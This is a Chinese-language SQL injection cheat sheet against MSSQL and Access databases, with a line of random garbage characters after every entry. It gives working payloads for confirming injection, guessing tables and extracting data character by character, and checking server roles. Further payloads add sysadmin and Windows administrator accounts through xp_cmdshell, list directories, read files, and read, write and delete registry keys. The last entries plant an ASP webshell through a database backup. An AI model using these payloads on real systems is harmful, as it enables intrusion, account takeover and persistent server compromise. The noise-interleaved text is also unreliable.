1.判断是否有注入;and 1=1 ;and 1=2 V��p5V
�m�
2.初步判断是否是mssql ;and user>0 �g}\U,�� (
?�6_�"nT*}
3.注入参数是字符'and [查询条件] and ''=' �Ah(\%3�5&
Ak�<IHp^�Q
4.搜索时没过滤参数的'and [查询条件] and '%25'=' d�j���8F6\
�b�uMiJ�zU
5.判断数据库系统 C5�.\;;7^&
@n5;|`)\�
;and (select count(*) from sysobjects)>0 mssql *[XN.sb8�E
7I�@�9v=xV
;and (select count(*) from msysobjects)>0 access AH"g^ gw~T
XhJ�P87�A
@5<]�W+jk4
e�'}eP�vN�
6.猜数据库 ;and (select Count(*) from [数据库名])>0 bCJ<=X,g`K
~(w=U �*��
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 V�{7lltu��
_OyP>|�L�'
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ���+9=@E�
5`OK-�����
9.(1)猜字段的ascii值(access) gxB�����l1
=�B3!��jir
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ;]��l{��D}
9RCB$Ka6�X
(2)猜字段的ascii值(mssql) ���q�?e16M
/j�=DC9�_
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ,�}xpYq_/�
f�4
Sw,��A
10.测试权限结构(mssql) #`YxoY��`
z=- �8iks|
0+V��ncL)u
1@1+4P0NF[
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- %^Q@�*+{:f
;XK�o�44%�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- pqGf@2�4c<
c_�D,MW\IC
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- )��-TeDIfm
)%H5iSNG$P
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- B5�?c'[V9�
?%8})^Dd>4
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- Q��(!}t"�u
#��J��<�`p
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- |}]J�Wsu�B
�V�2�9�S*�
;and 1=(select IS_MEMBER('db_owner'));-- eNl���F�2M
J*^�,l`�C/
4N%2w(�,+8
IV
3@6t4k�
11.添加mssql和系统的帐户 w|hyU4- �^
r(?'��Y�y�
;exec master.dbo.sp_addlogin username;-- 0k]���ju�
;exec master.dbo.sp_password null,username,password;-- a|]�%/�[G@
mZ& \3m�=
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- &�t9XK�8�S
/��ut~jf`�
;exec master.dbo.xp_cmdshell 'net user username password bH)8�UQR�%
5�{!a+���
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- /p�SU�n"3�
f)ucC$1�=�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ~�(l2%(�3G
Y9��I #��Q
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- 1�o5��Y9#7
x1�&b�@u��
�sg9x?�Bx9
�21)-:��rS
12.(1)遍历目录 h�Vt+%tmNy
.SKNI�ct
M
;create table dirs(paths varchar(100), id int) -G^��t�-�I
�]<o�.aMdV
;insert dirs exec master.dbo.xp_dirtree 'c:\' r�-\T}e2Gz
#�Z��Yid�t
;and (select top 1 paths from dirs)>0 ;?H��Z,"^I
AT'_0>�x�8
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) dWq/)��%@t
)W}��/�k$S
]�B-$�p p�
�"k_n+�cH%
(2)遍历目录 �^S�;�R�X*
0[$Mo3c+'�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ��r�z%[o,s
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �0D]Yz�`n3
!Sy'Z6%f��
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 '#�An�+;x{
;&t�1�FH#=
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �|<+|D��u1
L]L~TA<D9i
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 @e?[ooj�rM
u`H@Q&(^wa
{eD>E(Y@z1
3Mh,�NQ��B
13.mssql中的存储过程 /PB3^�d>Q2
D=I5[t�0c4
xp_regenumvalues 注册表根键, 子键 g�Q@Pw4bA
;o)`9<es!2
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 A8�6lyBDQ*
ZjI�/zqB�m
xp_regread 根键,子键,键值名 nm�:let7GB
V~�uA(3�\U
;exec xp_regread �^?S@v1~7d
>I��66R��;
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 Pu\DYP:�(�
]B�uk9LT�e
xp_regwrite 根键,子键, 值名, 值类型, 值 �i&�s=!�`
$M3A+6[�"H
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �$X<<Jns�K
uB�#�B\��i
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �ph&H��*Mc
T�~ q'y~9o
xp_regdeletevalue 根键,子键,值名 >-@{�vyoOy
%����OfDTs
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 -z~ V�����
??e#E[bI�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 _r�y E�n�
c7T�W�AG_+
�5���P �t}
9{^�B
Tc
14.mssql的backup创建webshell :7PSZc:�xE
�~C*6�V{Tj
use model �a� ~iEps�
'�N5r2JL[w
create table cmd(str image); Kg0\Pvg8?T
[�m+O0VK$�
insert into cmd(str) values (''); ]v�,�y�(yl
�]!Aze^7;�
backup database model to disk='c:\l.asp'; ~JmxW;|_x)
�OD��@A+"�
O@(.ei*HJ!
}�${Z��I�
15.mssql内置函数 &=��yqWW?�
�e�iSO7cGy
;and (select @@version)>0 获得Windows的版本号 $�O</ak�n;
\,ID��LXqp
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �H����gBEV
y�I�)�fu^
;and (select user_name())>0 爆当前系统的连接用户 u��Y%3X/^j
�Yr�cC�"��
;and (select db_name())>0 得到当前连接的数据库 =z�/m�I y<
�c�$SxDYG�
rJ~(Xu>,�s
Fe2���-;o
16.简洁的webshell H�E���<%�d
r-��"`Abev
use model 4�}YT@={g}
�(�p�xz#B4
create table cmd(str image); Y�wb�)h^{!
{ZYCnS&?CL
insert into cmd(str) values (''); 6Q?6-��,?_
(�i~%�4�w=
backup database model to disk='g:\wwwtest\l.asp';
